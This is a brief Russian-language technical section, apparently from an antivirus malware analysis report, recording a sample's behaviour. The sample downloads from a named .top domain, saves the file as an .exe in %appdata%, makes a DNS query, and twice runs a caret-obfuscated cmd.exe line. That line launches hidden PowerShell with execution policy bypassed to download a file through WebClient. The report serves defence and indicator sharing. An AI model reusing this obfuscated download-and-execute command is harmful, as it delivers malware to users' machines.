Техническая информация
- http://dpolly-dolly.top/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "p^oWe^Rs^HEl^L.E^x^e^ -^e^X^Ecuti^oNP^ol^Ic^y^ ^b^Y^p^ASs ^-N^OPRoFilE ^-W^iNdOW^S^Ty^le HI^Dd^en ^(^nE^W-^Ob^JeCt SYSTEm.neT^.^W^ebCLIe^nT).do^WNLOAdf^i^lE('http://d...
- DNS ASK dp####-dolly.top
- '<SYSTEM32>\cmd.exe' /c "p^oWe^Rs^HEl^L.E^x^e^ -^e^X^Ecuti^oNP^ol^Ic^y^ ^b^Y^p^ASs ^-N^OPRoFilE ^-W^iNdOW^S^Ty^le HI^Dd^en ^(^nE^W-^Ob^JeCt SYSTEm.neT^.^W^ebCLIe^nT).do^WNLOAdf^i^lE('http://d...' (со скрытым окном)